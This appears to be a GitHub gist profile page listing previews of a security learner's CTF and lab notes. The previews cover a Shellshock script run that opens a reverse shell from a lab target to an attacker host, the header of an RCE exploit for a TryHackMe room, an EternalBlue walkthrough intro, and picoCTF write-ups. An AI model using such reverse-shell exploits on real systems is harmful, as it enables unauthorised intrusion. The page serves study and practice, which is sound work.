Skip to content

Instantly share code, notes, and snippets.

View 05t3's full-sized avatar
♻️
Learning, Un-learning, Re-learning

05t3 05t3

♻️
Learning, Un-learning, Re-learning
View GitHub Profile
@05t3
05t3 / poc.md
Created July 4, 2022 14:48
Python script to exploit the shell-shock vulnerability. Credits to Federico Galatolo 2014
➜  sumo python shell_shock.py payload=reverse rhost=192.168.241.87 lhost=192.168.49.241 lport=6666 pages=/cgi-bin/test
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/test
[!] Successfully exploited
[!] Incoming connection from 192.168.241.87
192.168.241.87> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

192.168.241.87> whoami

Stego one - Cover your base 150pts

image

Aspire{Know your bases}

Stego three - Face the music 200pts

image

runme.py

Run the runme.py script to get the flag. Download the script with your browser or with wget in the webshell. Download runme.py Python script

oste-picoctf@webshell:~$ wget https://artifacts.picoctf.net/c/92/runme.py
--2022-01-12 20:51:52--  https://artifacts.picoctf.net/c/92/runme.py
Resolving artifacts.picoctf.net (artifacts.picoctf.net)... 99.84.248.96, 99.84.248.26, 99.84.248.60, ...
Connecting to artifacts.picoctf.net (artifacts.picoctf.net)|99.84.248.96|:443... connected.
HTTP request sent, awaiting response... 200 OK
@05t3
05t3 / Pico-CTF.md
Last active January 12, 2022 16:59

PRACTICE

FORENSICS

information

Author susie
Points 10
@05t3
05t3 / Invoke-ADGenerator.md
Last active January 5, 2022 09:59
Dear Sir, would you mind helping troubleshooting what might be going wrong when i setup the AD environment. I am currently setting up a lab for your course Movement, privoting & persistence on Udemy.

image

PS C:\Users\Administrator\Desktop\ADGenerator-main> dir


    Directory: C:\Users\Administrator\Desktop\ADGenerator-main


Mode                LastWriteTime         Length Name

3) Thaw Frost Tower's Entrance

Turn up the heat to defrost the entrance to Frost Tower. Click on the Items tab in your badge to find a link to the Wifi Dongle's CLI interface. Talk to Greasy Gopherguts outside the tower for tips.

Howdy howdy!  Mind helping me with this homew- er, challenge?
Someone ran nmap -oG on a big network and produced this bigscan.gnmap file.
The quizme program has the questions and hints and, incidentally,
has NOTHING to do with an Elf University assignment. Thanks!

Answer all the questions in the quizme executable:
@05t3
05t3 / rce-exploit-thm-zeno-room.py
Created November 3, 2021 18:07
This is a modified version of Ibad Shah's RCE script that will help you successfully achieve RCE on the Zeno THM room.
# Exploit Title: Restaurant Management System 1.0 - Remote Code Execution
# Date: 2019-10-16
# Exploit Author: Ibad Shah
# Script Modified by: 05t3 :twitter @oste_ke
# Vendor Homepage: https://www.sourcecodester.com/users/lewa
# Software Link: https://www.sourcecodester.com/php/11815/restaurant-management-system.html
# Version: N/A
# Tested on: Apache 2.4.41
#!/usr/bin/python
@05t3
05t3 / CVE-2017-0144.md
Last active March 21, 2024 16:41
This is a quick walkthrough of how you can go about exploiting eternalblue on a target

EternalBlue Exploit | MS17-010 PoC

Description

The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability."

You can read more about the exploit Wikipedia or Avast's Blog

Lab

PowerView.ps1 can be found here

PowerView.ps1 can be downloaded here

Documentation

Official Documentation

For more functions, check out: